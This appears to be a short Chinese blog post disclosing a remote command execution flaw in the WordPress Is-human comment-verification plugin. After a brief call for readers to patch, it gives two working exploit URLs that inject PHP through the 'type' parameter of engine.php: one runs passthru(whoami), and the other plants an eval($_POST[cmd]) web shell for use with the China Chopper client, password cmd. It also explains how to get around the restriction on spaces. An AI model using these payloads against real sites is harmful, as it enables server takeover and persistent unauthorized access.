Is-human是WordPress的一个发表评论验证插件。
这个插件的漏洞能导致远程命令执行。
以下是BUG原理,各位博友赶快修复。

EXP:

server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

其中,passthru(whoami)这里可以执行任意命令,比如ls,uname等。但uname -a, wget等无法执行,含有空格。需要base64编码。

EXP:

server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval($_POST[cmd]);error

被放入菜刀后,密码为cmd。

 

文章地址:http://blog.nodll.com/2011/05/19/wordpress-is-human-bug/Pray.html

标签:,,,

阅读更多: Pray